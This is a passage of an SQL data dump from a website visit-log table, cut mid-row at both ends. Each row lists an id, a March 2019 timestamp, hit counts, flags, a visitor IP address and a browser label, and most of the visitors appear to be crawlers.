1552135616,1,1,0,0,'95.158.38.179','chrome'),(397163,1552135751,1,1,0,0,'46.229.168.143','other'),(397164,1552135766,1,1,0,0,'54.36.150.88','other'),(397165,1552135773,1,1,0,0,'66.249.66.134','chrome'),(397166,1552135835,1,1,0,0,'54.36.148.245','other'),(397167,1552136030,1,1,0,0,'54.36.148.147','other'),(397168,1552136099,1,1,0,0,'54.36.150.151','other'),(397169,1552136214,1,1,0,0,'176.113.170.104','chrome'),(397170,1552136285,1,1,0,0,'157.55.39.147','other'),(397171,1552136311,1,1,0,0,'54.36.148.72','other'),(397172,1552137070,1,1,0,0,'54.36.148.73','other'),(397173,1552137269,1,1,0,0,'54.36.148.46','other'),(397174,1552137519,1,1,0,0,'66.249.66.134','chrome'),(397175,1552137806,1,1,0,0,'216.244.66.241','other'),(397176,1552138193,1,1,0,0,'54.36.150.191','other'),(397177,1552138287,1,1,0,0,'54.36.148.71','other'),(397178,1552138510,1,1,0,0,'51.255.65.46','other'),(397179,1552138634,1,1,0,0,'46.229.168.130','other'),(397180,1552138701,1,1,0,0,'46.229.168.140','other'),(397181,1552138892,1,1,0,0,'46.229.168.132','other'),(397182,1552139036,3,3,0,0,'66.249.66.138','chrome'),(397183,1552139177,1,1,0,0,'46.229.168.143','other'),(397184,1552139585,1,1,0,0,'216.244.66.241','other'),(397185,1552139591,1,1,0,0,'8.29.198.26','other'),(397186,1552139616,1,1,0,0,'91.196.178.176','chrome'),(397187,1552139678,1,1,0,0,'54.36.150.11','other'),(397188,1552139698,1,1,0,0,'8.29.198.27','other'),(397189,1552140473,1,1,0,0,'40.77.167.96','other'),(397190,1552140803,2,2,0,0,'40.77.167.20','other'),(397191,1552141171,1,1,0,0,'54.36.148.128','other'),(397192,1552141988,1,1,0,0,'157.55.39.147','other'),(397193,1552142090,1,1,0,0,'54.36.149.0','other'),(397194,1552142093,1,1,0,0,'54.36.149.34','other'),(397195,1552142375,1,1,0,0,'157.55.39.241','other'),(397196,1552142719,1,1,0,0,'54.36.149.51','other'),(397197,1552142851,1,1,0,0,'54.36.148.166','other'),(397198,1552143252,1,1,0,0,'40.77.167.96','other'),(397199,1552143268,1,1,0,0,'54.36.150.162','other'),(397200,1552143641,1,1,0,0,'5.142.54.220','chrome'),(397201,1552143717,1,1,0,0,'40.77.167.20','other'),(397202,1552143731,1,1,0,0,'91.209.11.236','other'),(397203,1552144420,1,1,0,0,'54.36.150.159','other'),(397204,1552144427,2,2,0,0,'141.8.142.103','other'),(397205,1552144462,1,1,0,0,'95.108.213.4','other'),(397206,1552145008,1,1,0,0,'216.244.66.241','other'),(397207,1552145319,1,1,0,0,'46.229.168.141','other'),(397208,1552145366,1,1,0,0,'54.36.150.136','other'),(397209,1552145754,1,1,0,0,'54.36.148.232','other'),(397210,1552145765,1,1,0,0,'54.36.149.78','other'),(397211,1552145818,3,3,0,0,'5.45.207.19','other'),(397212,1552146034,1,1,0,0,'178.154.244.11','other'),(397213,1552146069,1,1,0,0,'54.36.150.66','other'),(397214,1552146096,1,1,0,0,'46.229.168.132','other'),(397215,1552146216,5,5,0,0,'40.77.167.96','other'),(397216,1552146357,3,3,0,0,'5.45.207.79','other'),(397217,1552146488,1,1,0,0,'46.229.168.144','other'),(397218,1552146520,1,1,0,0,'178.154.171.24','other'),(397219,1552146553,5,5,0,0,'157.55.39.241','other'),(397220,1552146562,1,1,0,0,'40.77.167.20','other'),(397221,1552146582,4,4,0,0,'157.55.39.147','other'),(397222,1552146730,1,1,0,0,'66.249.66.136','chrome'),(397223,1552146745,1,1,0,0,'178.154.244.65','other'),(397224,1552146852,1,1,0,0,'87.250.224.65','other'),(397225,1552147293,1,1,0,0,'54.36.148.238','other'),(397226,1552147426,1,1,0,0,'178.154.244.11','other'),(397227,1552147493,1,1,0,0,'5.45.207.19','other'),(397228,1552147598,1,1,0,0,'54.36.149.81','other'),(397229,1552147613,1,1,0,0,'46.211.131.130','chrome'),(397230,1552147737,2,2,0,0,'40.77.167.96','other'),(397231,1552147786,1,1,0,0,'54.36.150.160','other'),(397232,1552148098,1,1,0,0,'54.36.148.98','other'),(397233,1552148108,1,1,0,0,'176.9.9.94','other'),(397234,1552148588,1,1,0,0,'178.154.244.11','other'),(397235,1552148589,1,1,0,0,'66.249.66.138','chrome'),(397236,1552148693,1,1,0,0,'54.36.148.58','other'),(397237,1552148875,1,1,0,0,'54.36.148.130','other'),(397238,1552149009,1,1,0,0,'92.112.125.252','chrome'),(397239,1552149019,1,1,0,0,'66.249.66.134','chrome'),(397240,1552149628,1,1,0,0,'180.76.15.135','other'),(397241,1552150003,1,1,0,0,'54.36.148.86','other'),(397242,1552150023,1,1,0,0,'157.55.39.241','other'),(397243,1552150206,1,1,0,0,'66.249.66.60','chrome'),(397244,1552150333,1,1,0,0,'54.36.149.56','other'),(397245,1552150353,1,1,0,0,'54.36.148.229','other'),(397246,1552150424,1,1,0,0,'8.29.198.25','other'),(397247,1552150548,1,1,0,0,'8.29.198.26','other'),(397248,1552150906,1,1,0,0,'54.36.148.191','other'),(397249,1552151073,1,1,0,0,'66.249.66.134','chrome'),(397250,1552151236,1,1,0,0,'54.36.149.9','other'),(397251,1552151250,1,1,0,0,'46.229.168.140','other'),(397252,1552151472,1,1,0,0,'54.36.150.76','other'),(397253,1552151478,1,1,0,0,'46.229.168.147','other'),(397254,1552151486,1,1,0,0,'54.36.149.84','other'),(397255,1552151582,1,1,0,0,'46.229.168.146','other'),(397256,1552151927,1,1,0,0,'216.244.66.241','other'),(397257,1552152279,1,1,0,0,'46.229.168.137','other'),(397258,1552152334,1,1,0,0,'40.77.167.20','other'),(397259,1552152559,1,1,0,0,'46.229.168.139','other'),(397260,1552152653,1,1,0,0,'46.229.168.134','other'),(397261,1552153243,1,1,0,0,'54.36.150.95','other'),(397262,1552153449,1,1,0,0,'157.55.39.241','other'),(397263,1552153980,1,1,0,0,'54.36.148.93','other'),(397264,1552155298,1,1,0,0,'216.244.66.241','other'),(397265,1552155541,1,1,0,0,'54.36.149.106','other'),(397266,1552155782,1,1,0,0,'54.36.150.122','other'),(397267,1552156700,1,1,0,0,'54.36.148.201','other'),(397268,1552157000,1,1,0,0,'207.46.13.48','other'),(397269,1552157418,1,1,0,0,'54.36.149.53','other'),(397270,1552157849,1,1,0,0,'54.36.149.104','other'),(397271,1552157998,1,1,0,0,'13.66.139.0','other'),(397272,1552158359,1,1,0,0,'54.36.150.46','other'),(397273,1552158372,1,1,0,0,'54.36.150.151','other'),(397274,1552158394,1,1,0,0,'46.229.168.138','other'),(397275,1552158453,1,1,0,0,'46.229.168.150','other'),(397276,1552158522,1,1,0,0,'46.229.168.134','other'),(397277,1552158793,1,1,0,0,'91.196.178.48','chrome'),(397278,1552159335,1,0,1,0,'66.249.64.220',''),(397279,1552159451,1,1,0,0,'66.249.64.220','chrome'),(397280,1552159502,1,1,0,0,'91.196.178.92','chrome'),(397281,1552159799,1,1,0,0,'54.36.150.102','other'),(397282,1552160271,1,1,0,0,'176.9.9.94','other'),(397283,1552160438,1,1,0,0,'66.249.64.220','chrome'),(397284,1552160493,1,1,0,0,'5.188.210.65','chrome'),(397285,1552160665,1,1,0,0,'46.229.168.132','other'),(397286,1552161039,1,1,0,0,'46.211.129.148','chrome'),(397287,1552161150,1,1,0,0,'5.45.207.19','other'),(397288,1552161243,1,1,0,0,'46.229.168.130','other'),(397289,1552161260,2,2,0,0,'8.29.198.26','other'),(397290,1552161294,1,1,0,0,'178.154.244.11','other'),(397291,1552161407,2,2,0,0,'207.46.13.48','other'),(397292,1552161591,1,1,0,0,'46.229.168.146','other'),(397293,1552161601,1,1,0,0,'54.36.149.85','other'),(397294,1552161984,1,1,0,0,'94.253.90.41','msie'),(397295,1552162116,2,2,0,0,'91.209.11.236','other'),(397296,1552162170,1,1,0,0,'5.45.207.19','other'),(397297,1552162459,1,1,0,0,'46.229.168.143','other'),(397298,1552162483,1,1,0,0,'54.36.148.33','other'),(397299,1552162500,1,1,0,0,'5.45.207.79','other'),(397300,1552162712,1,1,0,0,'54.36.150.177','other'),(397301,1552162955,1,1,0,0,'46.229.168.133','other'),(397302,1552163130,1,1,0,0,'207.46.13.48','other'),(397303,1552163378,2,2,0,0,'91.209.11.236','other'),(397304,1552163558,1,1,0,0,'46.229.168.149','other'),(397305,1552163670,1,1,0,0,'54.36.148.115','other'),(397306,1552163858,1,1,0,0,'54.36.149.0','other'),(397307,1552164089,1,1,0,0,'95.163.255.48','other'),(397308,1552164381,1,1,0,0,'54.36.150.177','other'),(397309,1552164960,1,1,0,0,'178.154.244.11','other'),(397310,1552164965,1,1,0,0,'54.36.148.236','other'),(397311,1552165451,1,1,0,0,'207.46.13.48','other'),(397312,1552165454,1,1,0,0,'157.55.39.241','other'),(397313,1552165822,1,1,0,0,'54.36.148.233','other'),(397314,1552166022,1,1,0,0,'46.229.168.134','other'),(397315,1552166023,1,1,0,0,'54.36.150.42','other'),(397316,1552166152,1,1,0,0,'54.36.150.54','other'),(397317,1552166339,1,1,0,0,'46.229.168.144','other'),(397318,1552166614,1,1,0,0,'180.76.15.152','other'),(397319,1552166756,1,1,0,0,'54.36.148.138','other'),(397320,1552166874,1,1,0,0,'157.55.39.241','other'),(397321,1552167090,1,1,0,0,'54.36.150.87','other'),(397322,1552167182,1,1,0,0,'54.36.150.6','other'),(397323,1552167268,1,1,0,0,'46.229.168.141','other'),(397324,1552167278,1,1,0,0,'54.36.150.146','other'),(397325,1552167528,1,1,0,0,'54.36.149.30','other'),(397326,1552167738,1,1,0,0,'54.36.150.116','other'),(397327,1552167806,1,1,0,0,'46.229.168.151','other'),(397328,1552167969,1,1,0,0,'207.46.13.48','other'),(397329,1552168012,1,1,0,0,'54.36.150.137','other'),(397330,1552168161,1,1,0,0,'54.36.149.53','other'),(397331,1552168377,1,1,0,0,'180.76.15.146','other'),(397332,1552169381,1,1,0,0,'207.46.13.48','other'),(397333,1552169744,1,1,0,0,'54.36.149.94','other'),(397334,1552170482,1,1,0,0,'54.36.148.81','other'),(397335,1552171376,1,1,0,0,'54.36.150.59','other'),(397336,1552171456,1,1,0,0,'46.229.168.130','other'),(397337,1552171490,2,2,0,0,'46.229.168.134','other'),(397338,1552171823,1,1,0,0,'54.36.148.55','other'),(397339,1552171918,1,1,0,0,'207.46.13.48','other'),(397340,1552172087,1,1,0,0,'54.36.148.125','other'),(397341,1552172103,2,2,0,0,'8.29.198.26','other'),(397342,1552172129,1,1,0,0,'54.36.148.164','other'),(397343,1552172996,1,1,0,0,'46.229.168.133','other'),(397344,1552173286,1,1,0,0,'54.36.148.148','other'),(397345,1552173343,1,1,0,0,'5.188.210.65','chrome'),(397346,1552173637,1,1,0,0,'66.249.64.218','chrome'),(397347,1552173722,2,2,0,0,'46.229.168.146','other'),(397348,1552173839,1,1,0,0,'54.36.150.184','other'),(397349,1552173854,1,1,0,0,'54.36.150.13','other'),(397350,1552173969,1,1,0,0,'54.36.148.16','other'),(397351,1552174102,1,1,0,0,'54.36.148.123','other'),(397352,1552174225,1,1,0,0,'46.229.168.132','other'),(397353,1552174431,1,1,0,0,'54.36.148.120','other'),(397354,1552174758,1,1,0,0,'54.36.149.20','other'),(397355,1552174863,1,1,0,0,'54.36.148.3','other'),(397356,1552175284,1,1,0,0,'54.36.149.73','other'),(397357,1552175520,1,1,0,0,'54.36.148.141','other'),(397358,1552175942,1,1,0,0,'54.36.150.134','other'),(397359,1552176640,1,1,0,0,'54.36.149.73','other'),(397360,1552176778,1,1,0,0,'54.36.148.91','other'),(397361,1552177069,1,1,0,0,'54.36.150.169','other'),(397362,1552177203,1,1,0,0,'54.36.149.45','other'),(397363,1552177213,1,1,0,0,'54.36.150.32','other'),(397364,1552177386,1,1,0,0,'40.77.167.27','other'),(397365,1552177939,1,1,0,0,'54.36.149.54','other'),(397366,1552178313,1,1,0,0,'46.229.168.130','other'),(397367,1552179030,5,5,0,0,'5.45.207.79','other'),(397368,1552179125,2,2,0,0,'95.108.213.4','other'),(397369,1552179131,4,4,0,0,'5.45.207.19','other'),(397370,1552179342,1,1,0,0,'178.154.244.11','other'),(397371,1552179403,1,1,0,0,'13.57.233.99','chrome'),(397372,1552179507,1,1,0,0,'54.36.148.94','other'),(397373,1552179801,1,1,0,0,'46.229.168.132','other'),(397374,1552179956,1,1,0,0,'54.36.149.103','other'),(397375,1552180046,5,5,0,0,'5.45.207.19','other'),(397376,1552180094,1,1,0,0,'54.36.148.138','other'),(397377,1552180162,2,2,0,0,'141.8.142.103','other'),(397378,1552180488,1,1,0,0,'54.36.149.23','other'),(397379,1552180729,1,1,0,0,'5.188.210.65','chrome'),(397380,1552181213,2,2,0,0,'5.45.207.19','other'),(397381,1552181249,2,2,0,0,'178.154.244.11','other'),(397382,1552181287,1,1,0,0,'54.36.148.251','other'),(397383,1552181685,3,3,0,0,'5.45.207.79','other'),(397384,1552181748,1,1,0,0,'141.8.142.103','other'),(397385,1552181788,1,1,0,0,'95.108.213.4','other'),(397386,1552181989,1,1,0,0,'54.36.148.193','other'),(397387,1552182015,1,1,0,0,'5.188.210.44','chrome'),(397388,1552182064,2,2,0,0,'46.229.168.137','other'),(397389,1552182220,2,2,0,0,'5.45.207.19','other'),(397390,1552182555,1,1,0,0,'178.154.244.11','other'),(397391,1552182944,1,1,0,0,'8.29.198.26','other'),(397392,1552182955,185,185,0,0,'144.76.6.230','other'),(397393,1552183065,1,1,0,0,'8.29.198.27','other'),(397394,1552183226,1,1,0,0,'54.36.150.103','other'),(397395,1552183390,1,1,0,0,'66.249.64.220','chrome'),(397396,1552183526,1,1,0,0,'46.229.168.133','other'),(397397,1552183736,1,1,0,0,'216.244.66.241','other'),(397398,1552183872,1,1,0,0,'54.36.148.171','other'),(397399,1552184053,1,1,0,0,'207.46.13.195','other'),(397400,1552184450,130,130,0,0,'173.212.229.76','other'),(397401,1552184747,1,1,0,0,'66.249.64.62','chrome'),(397402,1552184819,71,71,0,0,'5.189.132.132','other'),(397403,1552185121,1,1,0,0,'66.249.64.60','chrome'),(397404,1552185188,1,1,0,0,'54.36.148.79','other'),(397405,1552185353,86,86,0,0,'173.212.229.76','other'),(397406,1552185362,1,1,0,0,'54.36.148.232','other'),(397407,1552185489,1,1,0,0,'207.46.13.195','other'),(397408,1552185539,1,1,0,0,'66.249.64.218','chrome'),(397409,1552185641,1,1,0,0,'54.36.148.243','other'),(397410,1552185756,1,1,0,0,'54.36.149.36','other'),(397411,1552185947,1,1,0,0,'54.36.149.42','other'),(397412,1552186297,1,1,0,0,'46.229.168.152','other'),(397413,1552186692,1,1,0,0,'46.229.168.137','other'),(397414,1552187120,1,1,0,0,'207.46.13.195','other'),(397415,1552188025,1,1,0,0,'46.229.168.147','other'),(397416,1552188375,1,1,0,0,'46.229.168.138','other'),(397417,1552188434,1,1,0,0,'157.55.39.58','other'),(397418,1552188437,1,1,0,0,'66.249.64.220','chrome'),(397419,1552188666,1,1,0,0,'54.36.150.182','other'),(397420,1552188865,1,1,0,0,'5.45.207.19','other'),(397421,1552188980,1,1,0,0,'54.36.148.135','other'),(397422,1552189505,1,1,0,0,'54.36.148.141','other'),(397423,1552189813,1,1,0,0,'54.36.148.48','other'),(397424,1552189955,1,1,0,0,'54.36.150.55','other'),(397425,1552190144,1,1,0,0,'54.36.149.41','other'),(397426,1552190344,1,1,0,0,'54.36.150.163','other'),(397427,1552191177,1,1,0,0,'54.36.148.42','other'),(397428,1552191361,1,1,0,0,'54.36.149.45','other'),(397429,1552191375,1,1,0,0,'207.46.13.195','other'),(397430,1552191651,1,1,0,0,'54.36.148.141','other'),(397431,1552191802,1,1,0,0,'54.36.150.154','other'),(397432,1552192215,1,1,0,0,'46.229.168.138','other'),(397433,1552192707,1,1,0,0,'54.36.149.3','other'),(397434,1552192856,2,2,0,0,'66.249.64.222','chrome'),(397435,1552192887,1,1,0,0,'46.229.168.129','other'),(397436,1552193246,1,1,0,0,'46.229.168.136','other'),(397437,1552193459,1,1,0,0,'46.229.168.153','other'),(397438,1552193781,2,2,0,0,'8.29.198.25','other'),(397439,1552193785,1,1,0,0,'54.36.148.162','other'),(397440,1552193901,1,1,0,0,'54.36.150.178','other'),(397441,1552194141,1,1,0,0,'66.249.64.62','chrome'),(397442,1552194652,1,1,0,0,'216.244.66.241','other'),(397443,1552194696,1,1,0,0,'54.36.150.1','other'),(397444,1552195025,1,1,0,0,'194.113.106.125','chrome'),(397445,1552195027,1,1,0,0,'54.36.149.7','other'),(397446,1552195109,1,1,0,0,'54.36.150.176','other'),(397447,1552195138,1,1,0,0,'54.36.149.71','other'),(397448,1552195697,1,1,0,0,'180.76.15.150','other'),(397449,1552195917,1,1,0,0,'157.55.39.58','other'),(397450,1552195933,1,1,0,0,'66.249.64.220','chrome'),(397451,1552195977,1,1,0,0,'66.249.64.218','chrome'),(397452,1552196011,1,1,0,0,'54.36.148.76','other'),(397453,1552196029,1,1,0,0,'46.229.168.132','other'),(397454,1552196079,1,1,0,0,'87.250.224.47','other'),(397455,1552196081,2,2,0,0,'91.209.11.236','other'),(397456,1552196083,4,4,0,0,'95.108.213.4','other'),(397457,1552196166,1,1,0,0,'54.36.148.79','other'),(397458,1552196362,1,1,0,0,'46.229.168.133','other'),(397459,1552196407,1,1,0,0,'207.46.13.72','other'),(397460,1552196622,2,2,0,0,'141.8.142.103','other'),(397461,1552196788,2,2,0,0,'178.154.244.11','other'),(397462,1552196866,1,1,0,0,'54.36.150.83','other'),(397463,1552197025,1,1,0,0,'216.244.66.241','other'),(397464,1552197027,1,1,0,0,'54.36.148.64','other'),(397465,1552197169,1,1,0,0,'5.45.207.79','other'),(397466,1552197398,1,1,0,0,'54.36.148.42','other'),(397467,1552197411,1,1,0,0,'87.250.224.47','other'),(397468,1552197450,1,1,0,0,'46.229.168.130','other'),(397469,1552197725,1,1,0,0,'66.249.64.60','chrome'),(397470,1552197822,1,1,0,0,'178.154.244.11','other'),(397471,1552197825,2,2,0,0,'207.46.13.72','other'),(397472,1552198281,1,1,0,0,'54.36.150.178','other'),(397473,1552198284,1,1,0,0,'37.204.37.15','msie'),(397474,1552198355,1,1,0,0,'91.209.11.236','other'),(397475,1552198425,1,1,0,0,'46.229.168.133','other'),(397476,1552198614,1,1,0,0,'207.46.13.54','other'),(397477,1552198950,2,2,0,0,'34.209.153.101','chrome'),(397478,1552199348,1,1,0,0,'91.196.178.186','chrome'),(397479,1552199516,1,1,0,0,'77.247.181.162','other'),(397480,1552199576,1,1,0,0,'54.36.150.130','other'),(397481,1552199762,1,1,0,0,'54.36.148.151','other'),(397482,1552199919,1,1,0,0,'54.36.150.12','other'),(397483,1552200283,5,5,0,0,'207.46.13.72','other'),(397484,1552200363,1,1,0,0,'54.36.148.71','other'),(397485,1552200410,3,3,0,0,'157.55.39.58','other'),(397486,1552200418,2,2,0,0,'207.46.13.54','other'),(397487,1552200453,2,2,0,0,'207.46.13.195','other'),(397488,1552200522,1,1,0,0,'54.36.148.149','other'),(397489,1552200538,1,1,0,0,'46.229.168.129','other'),(397490,1552200556,1,1,0,0,'54.36.148.11','other'),(397491,1552200603,1,1,0,0,'176.9.9.94','other'),(397492,1552201446,1,1,0,0,'54.36.150.66','other'),(397493,1552202299,1,1,0,0,'216.244.66.241','other'),(397494,1552202342,1,1,0,0,'207.46.13.195','other'),(397495,1552202536,1,1,0,0,'54.36.150.49','other'),(397496,1552202940,1,1,0,0,'54.36.150.46','other'),(397497,1552203131,1,1,0,0,'66.249.64.222','chrome'),(397498,1552203191,1,1,0,0,'54.36.149.26','other'),(397499,1552203255,1,1,0,0,'207.46.13.72','other'),(397500,1552203851,1,1,0,0,'46.229.168.134','other'),(397501,1552203992,1,1,0,0,'46.229.168.141','other'),(397502,1552204013,1,1,0,0,'54.36.149.86','other'),(397503,1552204201,1,1,0,0,'91.196.178.82','chrome'),(397504,1552204244,1,1,0,0,'54.36.150.85','other'),(397505,1552204272,2,2,0,0,'207.46.13.195','other'),(397506,1552204612,1,1,0,0,'8.29.198.25','other'),(397507,1552204630,1,1,0,0,'157.55.39.58','other'),(397508,1552204736,1,1,0,0,'8.29.198.26','other'),(397509,1552204739,1,1,0,0,'93.185.21.152','chrome'),(397510,1552204764,1,1,0,0,'178.151.45.224','firefox'),(397511,1552204829,1,1,0,0,'66.249.64.60','chrome'),(397512,1552204854,1,1,0,0,'54.36.148.103','other'),(397513,1552205119,1,1,0,0,'85.140.1.240','chrome'),(397514,1552205376,1,1,0,0,'195.9.190.190','chrome'),(397515,1552205416,2,2,0,0,'213.87.130.207','other'),(397516,1552205664,1,1,0,0,'213.87.246.234','chrome'),(397517,1552205801,1,1,0,0,'91.196.178.24','chrome'),(397518,1552205826,1,1,0,0,'46.229.168.141','other'),(397519,1552205843,1,1,0,0,'141.8.142.103','other'),(397520,1552206318,1,1,0,0,'79.137.249.168','firefox'),(397521,1552206380,1,1,0,0,'66.249.64.222','chrome'),(397522,1552206629,1,1,0,0,'207.46.13.183','other'),(397523,1552206954,1,1,0,0,'54.36.148.71','other'),(397524,1552207659,1,1,0,0,'54.36.149.40','other'),(397525,1552207882,1,1,0,0,'54.36.150.155','other'),(397526,1552208326,1,1,0,0,'54.36.148.20','other'),(397527,1552208389,1,1,0,0,'54.36.150.93','other'),(397528,1552208426,1,1,0,0,'66.249.64.218','chrome'),(397529,1552208878,1,1,0,0,'54.36.148.122','other'),(397530,1552208977,1,1,0,0,'54.36.148.117','other'),(397531,1552209353,1,1,0,0,'46.211.151.121','chrome'),(397532,1552209395,1,1,0,0,'54.36.148.141','other'),(397533,1552209887,1,1,0,0,'46.229.168.138','other'),(397534,1552210814,1,1,0,0,'66.249.64.220','chrome'),(397535,1552210890,1,1,0,0,'66.249.64.58','chrome'),(397536,1552211095,1,1,0,0,'54.36.148.108','other'),(397537,1552211270,1,1,0,0,'54.36.148.196','other'),(397538,1552212074,1,1,0,0,'54.36.150.184','other'),(397539,1552212176,1,1,0,0,'46.229.168.135','other'),(397540,1552212503,5,5,0,0,'5.45.207.19','other'),(397541,1552212509,1,1,0,0,'5.45.207.79','other'),(397542,1552212513,6,6,0,0,'178.154.244.11','other'),(397543,1552212587,1,1,0,0,'141.8.142.103','other'),(397544,1552212595,1,1,0,0,'54.36.149.29','other'),(397545,1552212657,1,1,0,0,'54.36.150.37','other'),(397546,1552212925,1,1,0,0,'54.36.150.52','other'),(397547,1552213266,1,1,0,0,'46.229.168.129','other'),(397548,1552213484,1,1,0,0,'207.46.13.195','other'),(397549,1552213572,1,1,0,0,'54.36.149.28','other'),(397550,1552213632,1,1,0,0,'91.196.178.57','chrome'),(397551,1552213661,1,1,0,0,'141.8.142.103','other'),(397552,1552213993,3,3,0,0,'178.154.244.11','other'),(397553,1552214141,2,2,0,0,'5.45.207.79','other'),(397554,1552214207,1,1,0,0,'37.9.113.20','other'),(397555,1552214351,1,1,0,0,'54.36.148.240','other'),(397556,1552214435,1,1,0,0,'54.36.149.105','other'),(397557,1552214502,1,1,0,0,'95.108.213.4','other'),(397558,1552214688,1,1,0,0,'5.45.207.19','other'),(397559,1552214737,1,1,0,0,'54.36.149.76','other'),(397560,1552214847,1,1,0,0,'54.36.149.65','other'),(397561,1552215049,1,1,0,0,'54.36.148.103','other'),(397562,1552215161,1,1,0,0,'141.8.142.103','other'),(397563,1552215171,3,3,0,0,'5.45.207.79','other'),(397564,1552215204,1,1,0,0,'54.36.148.40','other'),(397565,1552215210,1,1,0,0,'46.229.168.151','other'),(397566,1552215444,2,2,0,0,'8.29.198.27','other'),(397567,1552215663,1,1,0,0,'54.36.150.189','other'),(397568,1552216046,1,1,0,0,'46.211.115.75','chrome'),(397569,1552216454,1,1,0,0,'54.36.149.210','other'),(397570,1552216482,1,1,0,0,'157.55.39.7','other'),(397571,1552216500,1,1,0,0,'46.211.41.50','chrome'),(397572,1552216608,1,1,0,0,'37.54.114.236','chrome'),(397573,1552216811,1,1,0,0,'13.66.139.0','other'),(397574,1552216875,1,1,0,0,'66.249.64.218','chrome'),(397575,1552217545,1,1,0,0,'54.36.148.212','other'),(397576,1552217613,1,1,0,0,'5.45.207.79','other'),(397577,1552218055,1,1,0,0,'54.36.149.16','other'),(397578,1552218094,1,1,0,0,'54.36.149.91','other'),(397579,1552218115,1,1,0,0,'54.36.150.55','other'),(397580,1552218772,1,1,0,0,'46.229.168.141','other'),(397581,1552218959,1,1,0,0,'54.36.148.70','other'),(397582,1552219230,1,1,0,0,'66.249.64.222','chrome'),(397583,1552219364,1,1,0,0,'54.36.148.217','other'),(397584,1552219493,1,1,0,0,'54.36.150.67','other'),(397585,1552219570,1,1,0,0,'46.211.132.137','chrome'),(397586,1552219731,1,1,0,0,'178.92.249.141','chrome'),(397587,1552220159,1,1,0,0,'46.229.168.151','other'),(397588,1552220445,1,1,0,0,'46.133.133.94','other'),(397589,1552220519,1,1,0,0,'54.36.150.37','other'),(397590,1552220741,1,1,0,0,'91.196.178.177','chrome'),(397591,1552220770,1,1,0,0,'66.249.64.62','chrome'),(397592,1552221098,1,1,0,0,'54.36.150.182','other'),(397593,1552221251,1,1,0,0,'54.36.150.42','other'),(397594,1552221353,1,1,0,0,'91.196.177.204','chrome'),(397595,1552222539,1,1,0,0,'95.132.38.122','chrome'),(397596,1552222608,1,1,0,0,'207.46.13.195','other'),(397597,1552222693,1,1,0,0,'91.196.178.38','chrome'),(397598,1552222748,1,1,0,0,'54.36.150.136','other'),(397599,1552222791,1,1,0,0,'54.36.148.237','other'),(397600,1552222802,1,1,0,0,'94.231.185.191','chrome'),(397601,1552222874,1,1,0,0,'54.36.150.186','other'),(397602,1552223003,1,1,0,0,'66.249.64.222','chrome'),(397603,1552223520,1,1,0,0,'66.249.64.220','chrome'),(397604,1552223889,1,1,0,0,'13.66.139.0','other'),(397605,1552224285,1,1,0,0,'176.14.242.104','msie'),(397606,1552224384,1,1,0,0,'46.229.168.139','other'),(397607,1552224409,1,1,0,0,'207.46.13.88','other'),(397608,1552224896,1,1,0,0,'66.249.64.218','chrome'),(397609,1552225028,1,1,0,0,'66.249.64.60','chrome'),(397610,1552225049,1,1,0,0,'66.249.64.58','chrome'),(397611,1552225464,1,1,0,0,'207.46.13.183','other'),(397612,1552225684,1,1,0,0,'91.196.178.18','chrome'),(397613,1552226295,1,1,0,0,'8.29.198.26','other'),(397614,1552226358,1,1,0,0,'207.46.13.88','other'),(397615,1552226418,1,1,0,0,'8.29.198.27','other'),(397616,1552226790,1,1,0,0,'66.249.64.218','chrome'),(397617,1552226888,1,1,0,0,'207.46.13.195','other'),(397618,1552226923,1,1,0,0,'46.211.111.97','chrome'),(397619,1552227100,1,1,0,0,'91.196.178.89','chrome'),(397620,1552227129,1,1,0,0,'66.249.64.220','chrome'),(397621,1552227238,1,1,0,0,'46.229.168.153','other'),(397622,1552227811,1,1,0,0,'66.249.64.218','chrome'),(397623,1552228131,1,1,0,0,'66.249.64.222','chrome'),(397624,1552229052,1,1,0,0,'216.244.66.241','other'),(397625,1552229101,1,1,0,0,'91.196.178.57','chrome'),(397626,1552229549,1,1,0,0,'207.46.13.88','other'),(397627,1552229943,1,1,0,0,'40.77.167.13','other'),(397628,1552230001,4,4,0,0,'178.154.244.11','other'),(397629,1552230421,1,1,0,0,'91.209.11.236','other'),(397630,1552230447,4,4,0,0,'5.45.207.79','other'),(397631,1552230591,1,1,0,0,'87.250.224.47','other'),(397632,1552231125,1,1,0,0,'91.196.178.134','chrome'),(397633,1552231393,1,1,0,0,'95.163.255.106','other'),(397634,1552231515,1,1,0,0,'95.163.255.44','other'),(397635,1552231640,1,1,0,0,'66.249.64.218','chrome'),(397636,1552231859,1,1,0,0,'207.46.13.195','other'),(397637,1552231903,1,1,0,0,'216.244.66.241','other'),(397638,1552232174,1,1,0,0,'46.229.168.148','other'),(397639,1552232229,1,1,0,0,'46.229.168.144','other'),(397640,1552232797,1,1,0,0,'91.209.11.236','other'),(397641,1552233270,1,1,0,0,'207.46.13.88','other'),(397642,1552233891,1,1,0,0,'46.229.168.130','other'),(397643,1552234698,1,1,0,0,'207.46.13.88','other'),(397644,1552234760,1,1,0,0,'46.229.168.153','other'),(397645,1552235966,1,1,0,0,'66.249.64.218','chrome'),(397646,1552236204,1,1,0,0,'66.249.64.62','chrome'),(397647,1552236220,1,1,0,0,'207.46.13.195','other'),(397648,1552236291,1,1,0,0,'130.180.220.123','chrome'),(397649,1552237124,1,1,0,0,'46.229.168.145','other'),(397650,1552237137,2,2,0,0,'8.29.198.25','other'),(397651,1552237379,1,1,0,0,'180.76.15.135','other'),(397652,1552237749,1,1,0,0,'66.249.64.222','chrome'),(397653,1552237854,1,1,0,0,'54.36.150.138','other'),(397654,1552237949,1,1,0,0,'54.36.150.56','other'),(397655,1552238061,1,1,0,0,'54.36.149.5','other'),(397656,1552238179,1,1,0,0,'66.249.64.218','chrome'),(397657,1552238207,1,1,0,0,'13.66.139.0','other'),(397658,1552238298,1,1,0,0,'207.46.13.122','other'),(397659,1552239019,1,1,0,0,'66.249.64.220','chrome'),(397660,1552239535,1,1,0,0,'54.36.148.70','other'),(397661,1552239794,1,1,0,0,'46.229.168.142','other'),(397662,1552239941,1,1,0,0,'66.249.64.218','chrome'),(397663,1552240586,1,1,0,0,'54.36.148.102','other'),(397664,1552240658,1,1,0,0,'54.36.150.4','other'),(397665,1552241061,1,1,0,0,'54.36.148.234','other'),(397666,1552241665,1,1,0,0,'54.36.148.145','other'),(397667,1552241668,1,1,0,0,'54.36.149.20','other'),(397668,1552241957,1,1,0,0,'46.229.168.136','other'),(397669,1552242424,1,1,0,0,'54.36.148.199','other'),(397670,1552242601,1,1,0,0,'54.36.148.51','other'),(397671,1552243049,1,1,0,0,'46.229.168.146','other'),(397672,1552243171,1,1,0,0,'54.36.150.133','other'),(397673,155